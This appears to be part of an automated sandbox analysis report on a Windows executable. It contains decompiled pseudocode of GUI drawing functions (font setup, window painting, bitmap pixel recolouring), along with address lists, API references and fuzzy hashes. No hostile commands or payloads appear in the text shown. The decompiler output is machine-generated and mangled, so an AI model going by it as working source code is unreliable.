				 *[fs:0x0] =  *((intOrPtr*)(_t249 - 0xc));
				return _t130;
			}

0x00415e52
0x00415e5e
0x00415e61
0x00415e64
0x00415e6b
0x00415e89
0x00000000
0x00415e6d
0x00415e6d
0x00415e6f
0x00415e75
0x00415e7b
0x00415e81
0x00415e8b
0x00415e8f
0x00415e97
0x00415e9a
0x00415e9f
0x00415ea2
0x00415ead
0x00415eb4
0x00415ec6
0x00415eca
0x00415ed0
0x00415ede
0x00415ef4
0x00415ef8
0x00415efd
0x00415f04
0x00415f07
0x00415f09
0x00415f0f
0x00415f10
0x00415f15
0x00415f15
0x00415f1e
0x00415f25
0x00415f2a
0x00415f3a
0x00415f3d
0x00415f43
0x00415f47
0x00415f51
0x00415f56
0x00415f5c
0x00415f62
0x00415f6c
0x00415f71
0x00415f75
0x00415f79
0x00415f81
0x00415f85
0x00415f8a
0x00415f8f
0x00415f97
0x00415f99
0x00415fa1
0x00415fd1
0x00415fd2
0x00415fa3
0x00415fa3
0x00415fa6
0x00415fa7
0x00415fab
0x00415fb0
0x00415fb4
0x00415fb8
0x00415fc0
0x00415fc4
0x00415fc4
0x00415fd7
0x00415fdf
0x00415fec
0x00415ffc
0x00415ffe
0x00416004
0x00416006
0x00416006
0x00416009
0x0041600f
0x00415f5c
0x00416018
0x0041601d
0x00416020
0x00416026
0x00416029
0x00416033
0x00416038
0x0041603c
0x00416040
0x00416048
0x0041604c
0x00416051
0x00416056
0x0041605e
0x00416061
0x0041606a
0x0041606f
0x00416072
0x00416078
0x00416079
0x0041607e
0x00416082
0x00416086
0x0041608e
0x00416092
0x0041609f
0x004160af
0x004160b7
0x004160b9
0x004160b9
0x004160be
0x004160cb
0x004160db
0x004160e0
0x004160b9
0x004160e5
0x004160e8
0x004160ee
0x004160ef
0x004160f4
0x004160f8
0x004160fc
0x00416104
0x00416108
0x0041611c
0x0041611c
0x00416124
0x00416128
0x00416128
0x00416026
0x00416138
0x00416144
0x0041614d
0x00416152
0x0041615c
0x00416160
0x00416165
0x0041616c
0x00416173
0x00416178
0x0041617f
0x00416184
0x00415e81
0x00415e75
0x0041618a
0x00416192

APIs

_EH_prolog.MSVCRT ref: 00415E52
#540.MFC42 ref: 00415E8F
#540.MFC42 ref: 00415E9A
SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 00415ED0
CreateFontIndirectA.GDI32(?), ref: 00415EEE
#1641.MFC42(00000000), ref: 00415EF8
GetDesktopWindow.USER32 ref: 00415F09
#2864.MFC42(00000000), ref: 00415F10
GetDC.USER32(?), ref: 00415F1E
#2859.MFC42(00000000), ref: 00415F25
GetMenuItemCount.USER32 ref: 00415F3D
#858.MFC42(00000000,?), ref: 00415F79
#800.MFC42(00000000,?), ref: 00415F85
#2763.MFC42(00000009,00000000,?), ref: 00415F8F
#2614.MFC42(00000009,00000000,?), ref: 00415F99
#4129.MFC42(?,00000000,00000009,00000000,?), ref: 00415FAB
#858.MFC42(00000000,?,00000000,00000009,00000000,?), ref: 00415FB8
#800.MFC42(00000000,?,00000000,00000009,00000000,?), ref: 00415FC4
#858.MFC42(?,00000009,00000000,?), ref: 00415FD2
#941.MFC42(00440D18,?,00000009,00000000,?), ref: 00415FDF
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00415FFC
#858.MFC42(00000000,?), ref: 00416040
#800.MFC42(00000000,?), ref: 0041604C
#2763.MFC42(00000009,00000000,?), ref: 00416056
#2614.MFC42(00000009,00000000,?), ref: 0041606A
#4129.MFC42(?,?,00000009,00000000,?), ref: 00416079
#858.MFC42(00000000,?,?,00000009,00000000,?), ref: 00416086
#800.MFC42(00000000,?,?,00000009,00000000,?), ref: 00416092
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004160AF
#940.MFC42(00000020,?,?,00000000,?,?,00000009,00000000,?), ref: 004160BE
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004160DB
#4277.MFC42(?,?,?,?,00000000,?,?,00000009,00000000,?), ref: 004160EF
#939.MFC42(00000000,?,?,?,?,00000000,?,?,00000009,00000000,?), ref: 004160FC
#800.MFC42(00000000,?,?,?,?,00000000,?,?,00000009,00000000,?), ref: 00416108
ReleaseDC.USER32 ref: 00416144
#2414.MFC42 ref: 0041614D
#2414.MFC42 ref: 00416160
#800.MFC42 ref: 00416173
#800.MFC42 ref: 0041617F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#858$ExtentPoint32Text$#2414#2614#2763#4129#540$#1641#2859#2864#4277#939#940#941CountCreateDesktopFontH_prologIndirectInfoItemMenuParametersReleaseSystemWindow
String ID:
API String ID: 1481410978-0
Opcode ID: 218c74442c30cad8630322b0df2244a98d6c5c96c56f7eef0b92ef4a9dd06a0b
Instruction ID: 1b445ff98359ee703f61b7aac4704f8015ce7fba6d0fefae27cce598689cdfd5
Opcode Fuzzy Hash: 218c74442c30cad8630322b0df2244a98d6c5c96c56f7eef0b92ef4a9dd06a0b
Instruction Fuzzy Hash: DDB17A70D00129DFCF04EBA5D985AEEBBB4FF08304F50405EE511B3292DB38AA49CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401131, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 226
windowCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00401131(intOrPtr* __ecx, void* __eflags) {
				signed int _t110;
				struct HBRUSH__* _t115;
				signed int _t125;
				intOrPtr _t126;
				signed int _t127;
				intOrPtr* _t134;
				void* _t180;
				void* _t182;
				void* _t183;

				L004269E6();
				_t183 = _t182 - 0x74;
				_t134 = __ecx;
				_push(__ecx);
				L0042654C();
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x20), _t180 - 0x4c);
				_push(_t180 - 0x4c);
				L00426546();
				GetWindowRect( *(_t134 + 0x20), _t180 - 0x2c);
				OffsetRect(_t180 - 0x4c,  ~( *(_t180 - 0x2c)),  ~( *(_t180 - 0x28)));
				OffsetRect(_t180 - 0x2c,  ~( *(_t180 - 0x2c)),  ~( *(_t180 - 0x28)));
				L004264B0();
				 *(_t180 - 4) = 1;
				asm("sbb eax, eax");
				_push(CreateCompatibleDC( ~(_t180 - 0x80) &  *(_t180 - 0x7c)));
				L004264AA();
				L00401974(_t180 - 0x1c);
				 *(_t180 - 0x1c) = 0x42e34c;
				 *(_t180 - 4) = 2;
				_push(CreateCompatibleBitmap( *(_t180 - 0x7c),  *((intOrPtr*)(_t180 - 0x24)) -  *(_t180 - 0x2c),  *((intOrPtr*)(_t180 - 0x20)) -  *(_t180 - 0x28)));
				L004264BC();
				_t29 = _t180 - 0x1c; // 0x42e34c
				asm("sbb eax, eax");
				_t110 =  ~_t29 &  *(_t180 - 0x18);
				_push(_t110);
				_push( *(_t180 - 0x38));
				L00426540();
				 *(_t180 - 0x14) = _t110;
				_push(_t180 - 0x4c);
				L0042653A();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t180 - 0x5c);
				_push(_t180 - 0x3c);
				asm("movsd");
				L00426534();
				_push(_t180 - 0x5c);
				L0042652E();
				_t115 = GetClassLongA( *(_t134 + 0x20), 0xfffffff6);
				_push(_t115);
				L00426528();
				if(_t115 != 0) {
					_t115 =  *(_t115 + 4);
				}
				FillRect( *(_t180 - 0x38), _t180 - 0x5c, _t115);
				if(( *(_t134 + 0x7c) & 0x00000010) != 0) {
					 *(_t180 - 0x10) =  *(_t180 - 0x10) & 0x00000000;
					do {
						_t127 =  *(_t180 - 0x10);
						if(_t127 != 0) {
							if(_t127 != 1) {
								if(_t127 != 2) {
									if(_t127 == 3) {
										_push(0xf);
										goto L13;
									}
								} else {
									_push(0xb);
									goto L13;
								}
							} else {
								_push(0xc);
								goto L13;
							}
						} else {
							_push(0xa);
							L13:
							_pop(0);
						}
						_push(_t180 - 0x6c);
						_push(0);
						_t183 = _t183 - 0x10;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(L004018AC(_t134) != 0) {
							_push(GetSysColor(0x10));
							_push(GetSysColor(0x14));
							_push(_t180 - 0x6c);
							L004264D4();
						}
						 *(_t180 - 0x10) =  *(_t180 - 0x10) + 1;
					} while ( *(_t180 - 0x10) < 4);
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_t134 + 0x108))(_t180 - 0x3c);
				asm("sbb eax, eax");
				BitBlt( *(_t180 - 0x7c), 0, 0,  *((intOrPtr*)(_t180 - 0x24)) -  *(_t180 - 0x2c),  *((intOrPtr*)(_t180 - 0x20)) -  *(_t180 - 0x28),  ~(_t180 - 0x3c) &  *(_t180 - 0x38), 0, 0, 0xcc0020);
				ReleaseDC( *(_t134 + 0x20),  *(_t180 - 0x7c));
				_t125 =  *(_t180 - 0x14);
				if(_t125 != 0) {
					_t126 =  *((intOrPtr*)(_t125 + 4));
				} else {
					_t126 = 0;
				}
				_push(_t126);
				_push( *(_t180 - 0x38));
				L00426540();
				L00425FA6();
				L004264A4();
				 *(_t180 - 0x1c) = 0x42c514;
				 *(_t180 - 4) = 3;
				L00425FA6();
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				 *(_t180 - 0x1c) = 0x42c4fc;
				L0042649E();
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				L00426522();
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t126;
			}

0x00410467
0x0041046c
0x00410471
0x00410474
0x00410478
0x0041047d
0x00410488
0x00410493
0x00410494
0x004104a0
0x004104bc
0x004104ce
0x004104d3
0x004104db
0x004104e1
0x004104ed
0x004104f1
0x004104f9
0x004104fe
0x00410511
0x00410520
0x00410524
0x00410529
0x0041052e
0x00410530
0x00410533
0x00410534
0x00410537
0x0041053c
0x00410542
0x00410546
0x00410551
0x00410552
0x00410558
0x00410559
0x0041055d
0x0041055e
0x0041055f
0x0041056a
0x0041056b
0x00410575
0x0041057b
0x0041057c
0x00410583
0x00410585
0x00410585
0x00410590
0x0041059a
0x0041059c
0x004105a0
0x004105a0
0x004105a5
0x004105ae
0x004105b7
0x004105c0
0x004105c2
0x00000000
0x004105c2
0x004105b9
0x004105b9
0x00000000
0x004105b9
0x004105b0
0x004105b0
0x00000000
0x004105b0
0x004105a7
0x004105a7
0x004105c4
0x004105c4
0x004105c4
0x004105cf
0x004105d0
0x004105d1
0x004105d8
0x004105d9
0x004105da
0x004105db
0x004105e3
0x004105ef
0x004105f4
0x004105f8
0x004105fc
0x004105fc
0x00410601
0x00410604
0x004105a0
0x00410614
0x00410615
0x00410616
0x0041061d
0x0041061e
0x0041063a
0x0041064b
0x00410657
0x0041065d
0x00410662
0x00410668
0x00410664
0x00410664
0x00410664
0x0041066b
0x0041066c
0x0041066f
0x00410677
0x0041067f
0x00410684
0x0041068e
0x00410692
0x00410697
0x0041069e
0x004106a5
0x004106aa
0x004106b1
0x004106bb
0x004106c4

APIs

_EH_prolog.MSVCRT ref: 00410467
#562.MFC42 ref: 00410478
GetClientRect.USER32 ref: 00410488
#6605.MFC42(?), ref: 00410494
GetWindowRect.USER32 ref: 004104A0
OffsetRect.USER32(?,?,?), ref: 004104BC
OffsetRect.USER32(?,?,?), ref: 004104CE
#323.MFC42 ref: 004104D3
CreateCompatibleDC.GDI32(?), ref: 004104E7
#1640.MFC42(00000000), ref: 004104F1
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041051A
#1641.MFC42(00000000), ref: 00410524
#5785.MFC42(?,?,00000000), ref: 00410537
#2714.MFC42(?,?,?,00000000), ref: 00410546
#2569.MFC42(?,?,?,?,?,00000000), ref: 0041055F
#4023.MFC42(?,?,?,?,?,?,00000000), ref: 0041056B
GetClassLongA.USER32 ref: 00410575
#2860.MFC42(00000000), ref: 0041057C
FillRect.USER32 ref: 00410590
GetSysColor.USER32(00000010), ref: 004105ED
GetSysColor.USER32(00000014), ref: 004105F2
#2567.MFC42(?,00000000), ref: 004105FC
BitBlt.GDI32(00000010,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041064B
ReleaseDC.USER32 ref: 00410657
#5785.MFC42(?,00000002), ref: 0041066F
#2414.MFC42(?,00000002), ref: 00410677
#2405.MFC42(?,00000002), ref: 0041067F
#2414.MFC42(?,00000002), ref: 00410692
#640.MFC42(?,00000002), ref: 004106A5
#816.MFC42(?,00000002), ref: 004106B1

Strings

LB, xrefs: 00410521

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$#2414#5785ColorCompatibleCreateOffset$#1640#1641#2405#2567#2569#2714#2860#323#4023#562#640#6605#816BitmapClassClientFillH_prologLongReleaseWindow
String ID: LB
API String ID: 751218347-3532020319
Opcode ID: 3a4924bab948575f748fc938b6d5a42bb8aeacbd725bbef5f88ae253afb509cd
Instruction ID: 73104f1fd9a088f6667cb8f94c01c143af1009ea9b550939ea17e34a2430798c
Opcode Fuzzy Hash: 3a4924bab948575f748fc938b6d5a42bb8aeacbd725bbef5f88ae253afb509cd
Instruction Fuzzy Hash: E8813B72D00119AFDF14EFE4EC85AEEBBB9EF09304F50812AF811A7191DB786945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00416EA7, Relevance: 50.9, APIs: 27, Strings: 2, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00416EA7(signed long long __fp0) {
				void* _t89;
				signed int _t98;
				long _t107;
				void* _t108;
				unsigned int _t110;
				void* _t117;
				int _t119;
				signed int _t120;
				int _t122;
				signed int _t141;
				signed char _t142;
				void* _t155;
				void* _t157;
				signed long long* _t158;
				signed long long _t169;

				_t169 = __fp0;
				L004269E6();
				_t158 = _t157 - 0x6c;
				L004264B0();
				_t119 =  *(_t155 + 8);
				 *(_t155 - 4) = 0;
				GetObjectA( *(_t119 + 4), 0x18, _t155 - 0x78);
				_push(CreateCompatibleDC(0));
				L004264AA();
				if(_t119 != 0) {
					_t89 =  *(_t119 + 4);
				} else {
					_t89 = 0;
				}
				_push(_t89);
				_push( *(_t155 - 0x3c));
				L00426540();
				 *(_t155 - 0x20) = _t89;
				L004264B0();
				L00401974(_t155 - 0x28);
				 *(_t155 - 0x28) = 0x42e55c;
				L00401974(_t155 - 0x30);
				 *(_t155 - 0x30) = 0x42e34c;
				 *(_t155 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t155 - 0x3c),  *(_t155 - 0x74),  *(_t155 - 0x70)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t22 = _t155 - 0x30; // 0x42e34c
				asm("sbb eax, eax");
				_t98 =  ~_t22 &  *(_t155 - 0x2c);
				_push(_t98);
				_push( *(_t155 - 0x4c));
				L00426540();
				_t120 = _t98;
				 *(_t155 - 0x58) =  *(_t155 - 0x74);
				 *(_t155 - 0x54) =  *(_t155 - 0x70);
				_t29 = _t155 - 0x28; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t155 - 0x60) = 0;
				 *((intOrPtr*)(_t155 - 0x5c)) = 0;
				FillRect( *(_t155 - 0x4c), _t155 - 0x60,  ~_t29 &  *(_t155 - 0x24));
				 *((intOrPtr*)(_t155 - 0x10)) = GetPixel( *(_t155 - 0x4c), 1, 1);
				L00425FA6();
				if(_t120 != 0) {
					_t120 =  *(_t120 + 4);
				}
				_push(_t120);
				_push( *(_t155 - 0x4c));
				L00426540();
				_t107 = GetSysColor(0x10);
				 *(_t155 + 8) =  *(_t155 + 8) & 0x00000000;
				 *(_t155 - 0x1c) = _t107;
				if( *(_t155 - 0x74) > 0) {
					do {
						_t122 = 0;
						if( *(_t155 - 0x70) > 0) {
							do {
								_t110 = GetPixel( *(_t155 - 0x3c),  *(_t155 + 8), _t122);
								_t142 = _t110;
								_t164 = _t142 -  *((intOrPtr*)(_t155 - 0x10));
								if(_t142 ==  *((intOrPtr*)(_t155 - 0x10))) {
									__eflags =  *((intOrPtr*)(_t155 + 0xc));
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t155 + 0xc)));
										goto L12;
									}
								} else {
									_t141 = 3;
									asm("cdq");
									_push(_t141);
									 *(_t155 - 0x14) = ((_t110 >> 0x00000010 & 0x000000ff) + (_t142 & 0x000000ff) + (_t142 & 0x000000ff)) / _t141;
									asm("fild dword [ebp-0x14]");
									 *(_t155 - 0x18) = _t169;
									 *(_t155 - 0x18) =  *(_t155 - 0x18) /  *0x42e718;
									_t169 =  *(_t155 - 0x18);
									 *_t158 = _t169;
									_t117 = L0040226B(_t164,  *(_t155 - 0x1c), _t141);
									_t158 =  &(_t158[1]);
									_push(_t117);
									L12:
									SetPixel( *(_t155 - 0x3c),  *(_t155 + 8), _t122, ??);
								}
								_t122 = _t122 + 1;
							} while (_t122 <  *(_t155 - 0x70));
						}
						 *(_t155 + 8) =  *(_t155 + 8) + 1;
					} while ( *(_t155 + 8) <  *(_t155 - 0x74));
				}
				_t108 =  *(_t155 - 0x20);
				if(_t108 != 0) {
					_t108 =  *(_t108 + 4);
				}
				_push(_t108);
				_push( *(_t155 - 0x3c));
				L00426540();
				 *(_t155 - 0x30) = 0x42c514;
				 *(_t155 - 4) = 4;
				L00425FA6();
				 *(_t155 - 0x28) = 0x42c514;
				 *(_t155 - 0x30) = 0x42c4fc;
				 *(_t155 - 4) = 5;
				L00425FA6();
				 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
				 *(_t155 - 0x28) = 0x42c4fc;
				L0042649E();
				 *(_t155 - 4) =  *(_t155 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t155 - 0xc));
				return _t108;
			}

0x00416ea7
0x00416eac
0x00416eb1
0x00416eba
0x00416ebf
0x00416ecd
0x00416ed0
0x00416edf
0x00416ee3
0x00416eea
0x00416ef0
0x00416eec
0x00416eec
0x00416eec
0x00416ef3
0x00416ef4
0x00416ef7
0x00416eff
0x00416f02
0x00416f0a
0x00416f0f
0x00416f19
0x00416f1e
0x00416f26
0x00416f2c
0x00416f30
0x00416f44
0x00416f48
0x00416f5e
0x00416f62
0x00416f67
0x00416f6c
0x00416f6e
0x00416f71
0x00416f72
0x00416f75
0x00416f7a
0x00416f7f
0x00416f85
0x00416f88
0x00416f8d
0x00416f8f
0x00416f95
0x00416fa0
0x00416fb8
0x00416fbb
0x00416fc2
0x00416fc4
0x00416fc4
0x00416fc7
0x00416fc8
0x00416fcb
0x00416fd2
0x00416fd4
0x00416fdc
0x00416fdf
0x00416feb
0x00416feb
0x00416ff0
0x00416ff2
0x00416ff9
0x00416ffb
0x00416ffd
0x00417000
0x00417047
0x0041704b
0x0041704d
0x00000000
0x0041704d
0x00417002
0x00417018
0x00417019
0x0041701c
0x0041701e
0x00417021
0x00417024
0x00417030
0x00417033
0x00417036
0x0041703c
0x00417041
0x00417044
0x00417050
0x00417057
0x00417057
0x00417059
0x0041705a
0x00416ff2
0x0041705f
0x00417065
0x00416feb
0x0041706a
0x0041706f
0x00417071
0x00417071
0x00417074
0x00417075
0x00417078
0x00417082
0x00417088
0x0041708c
0x00417096
0x00417099
0x0041709f
0x004170a3
0x004170a8
0x004170af
0x004170b2
0x004170b7
0x004170be
0x004170c9
0x004170d1

APIs

_EH_prolog.MSVCRT ref: 00416EAC
#323.MFC42 ref: 00416EBA
GetObjectA.GDI32(?,00000018,?), ref: 00416ED0
CreateCompatibleDC.GDI32(00000000), ref: 00416EDD
#1640.MFC42(00000000), ref: 00416EE3
#5785.MFC42(?,?,00000000), ref: 00416EF7
#323.MFC42(?,?,00000000), ref: 00416F02
CreateCompatibleDC.GDI32(00000000), ref: 00416F2A
#1640.MFC42(00000000), ref: 00416F30
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00416F3E
#1641.MFC42(00000000), ref: 00416F48
GetSysColor.USER32(0000000F), ref: 00416F55
CreateSolidBrush.GDI32(00000000), ref: 00416F58
#1641.MFC42(00000000), ref: 00416F62
#5785.MFC42(?,?,00000000), ref: 00416F75
FillRect.USER32 ref: 00416FA0
GetPixel.GDI32(?,00000001,00000001), ref: 00416FB3
#2414.MFC42 ref: 00416FBB
#5785.MFC42(?,00000000), ref: 00416FCB
GetSysColor.USER32(00000010), ref: 00416FD2
GetPixel.GDI32(?,00000000,00000000), ref: 00416FF9
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00417057
#5785.MFC42(?,?), ref: 00417078
#2414.MFC42(?,?), ref: 0041708C
#2414.MFC42(?,?), ref: 004170A3
#640.MFC42(?,?), ref: 004170B2
#640.MFC42(?,?), ref: 004170BE

Strings

LB, xrefs: 00416F45
\B, xrefs: 00416F5F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640Color$BitmapBrushFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 672399798-2432678322
Opcode ID: 6945e21c9dc2e88222653b1d1a3bf33f57338b5c88f6b0202aa090654067d661
Instruction ID: 9026c5748ba005958e6c497e2c902f3f9fcbc358791572676fa64bde31492a8b
Opcode Fuzzy Hash: 6945e21c9dc2e88222653b1d1a3bf33f57338b5c88f6b0202aa090654067d661
Instruction Fuzzy Hash: A9711871D00228EBCF10EFE1EC85AEEBBB4FF58314F51412AE501A7251DB789A55CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004170D4, Relevance: 50.9, APIs: 27, Strings: 2, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004170D4() {
				int _t82;
				intOrPtr _t83;
				signed int _t92;
				intOrPtr _t101;
				intOrPtr _t102;
				void* _t106;
				void* _t110;
				signed int _t126;
				intOrPtr _t127;
				int _t130;
				void* _t136;
				void* _t138;
				long long* _t139;

				L004269E6();
				_t139 = _t138 - 0x64;
				_t110 = _t136 - 0x38;
				L004264B0();
				 *(_t136 - 4) = 0;
				 *(_t136 - 0x10) = GetSysColor(0x10);
				if( *0x4421ac != 7) {
					L2:
					_push(_t110);
					 *_t139 =  *0x42e728;
					 *(_t136 - 0x10) = L0040226B(_t143,  *(_t136 - 0x10), _t110);
				} else {
					_t106 = L00401F23();
					_t143 = _t106;
					if(_t106 != 0) {
						goto L2;
					}
				}
				GetObjectA( *( *(_t136 + 8) + 4), 0x18, _t136 - 0x70);
				_push(CreateCompatibleDC(0));
				L004264AA();
				_t82 =  *(_t136 + 8);
				if(_t82 != 0) {
					_t83 =  *((intOrPtr*)(_t82 + 4));
				} else {
					_t83 = 0;
				}
				_push(_t83);
				_push( *(_t136 - 0x34));
				L00426540();
				 *((intOrPtr*)(_t136 - 0x18)) = _t83;
				L004264B0();
				L00401974(_t136 - 0x20);
				 *(_t136 - 0x20) = 0x42e55c;
				L00401974(_t136 - 0x28);
				 *(_t136 - 0x28) = 0x42e34c;
				 *(_t136 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t136 - 0x34),  *(_t136 - 0x6c),  *(_t136 - 0x68)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t26 = _t136 - 0x28; // 0x42e34c
				asm("sbb eax, eax");
				_t92 =  ~_t26 &  *(_t136 - 0x24);
				_push(_t92);
				_push( *(_t136 - 0x44));
				L00426540();
				_t126 = _t92;
				 *(_t136 - 0x50) =  *(_t136 - 0x6c);
				 *(_t136 - 0x4c) =  *(_t136 - 0x68);
				_t33 = _t136 - 0x20; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t136 - 0x58) = 0;
				 *((intOrPtr*)(_t136 - 0x54)) = 0;
				FillRect( *(_t136 - 0x44), _t136 - 0x58,  ~_t33 &  *(_t136 - 0x1c));
				 *((intOrPtr*)(_t136 - 0x14)) = GetPixel( *(_t136 - 0x44), 1, 1);
				L00425FA6();
				if(_t126 != 0) {
					_t127 =  *((intOrPtr*)(_t126 + 4));
				} else {
					_t127 = 0;
				}
				_push(_t127);
				_push( *(_t136 - 0x44));
				L00426540();
				 *(_t136 + 8) = 0;
				if( *(_t136 - 0x6c) > 0) {
					do {
						_t130 = 0;
						if( *(_t136 - 0x68) > 0) {
							do {
								if(GetPixel( *(_t136 - 0x34),  *(_t136 + 8), _t130) !=  *((intOrPtr*)(_t136 - 0x14))) {
									SetPixel( *(_t136 - 0x34),  *(_t136 + 8), _t130,  *(_t136 - 0x10));
								}
								_t130 = _t130 + 1;
							} while (_t130 <  *(_t136 - 0x68));
						}
						 *(_t136 + 8) =  *(_t136 + 8) + 1;
					} while ( *(_t136 + 8) <  *(_t136 - 0x6c));
				}
				_t101 =  *((intOrPtr*)(_t136 - 0x18));
				if(_t101 != 0) {
					_t102 =  *((intOrPtr*)(_t101 + 4));
				} else {
					_t102 = 0;
				}
				_push(_t102);
				_push( *(_t136 - 0x34));
				L00426540();
				 *(_t136 - 0x28) = 0x42c514;
				 *(_t136 - 4) = 4;
				L00425FA6();
				 *(_t136 - 0x20) = 0x42c514;
				 *(_t136 - 0x28) = 0x42c4fc;
				 *(_t136 - 4) = 5;
				L00425FA6();
				 *(_t136 - 0x20) = 0x42c4fc;
				 *(_t136 - 4) = 0;
				L0042649E();
				 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t136 - 0xc));
				return _t102;
			}

0x004170d9
0x004170de
0x004170e4
0x004170e7
0x004170f6
0x00417102
0x00417105
0x00417110
0x00417116
0x00417118
0x00417126
0x00417107
0x00417107
0x0041710c
0x0041710e
0x00000000
0x00000000
0x0041710e
0x00417135
0x00417144
0x00417148
0x0041714d
0x00417152
0x00417158
0x00417154
0x00417154
0x00417154
0x0041715b
0x0041715c
0x0041715f
0x00417167
0x0041716a
0x00417172
0x00417177
0x00417181
0x00417186
0x0041718e
0x00417194
0x00417198
0x004171ac
0x004171b0
0x004171c0
0x004171c4
0x004171c9
0x004171ce
0x004171d0
0x004171d3
0x004171d4
0x004171d7
0x004171dc
0x004171e1
0x004171e7
0x004171ea
0x004171ef
0x004171f1
0x004171f7
0x00417202
0x0041721a
0x0041721d
0x00417224
0x0041722a
0x00417226
0x00417226
0x00417226
0x0041722d
0x0041722e
0x00417231
0x00417239
0x0041723c
0x0041723e
0x0041723e
0x00417243
0x00417245
0x00417251
0x0041725d
0x0041725d
0x00417263
0x00417264
0x00417245
0x00417269
0x0041726f
0x0041723e
0x00417274
0x00417279
0x0041727f
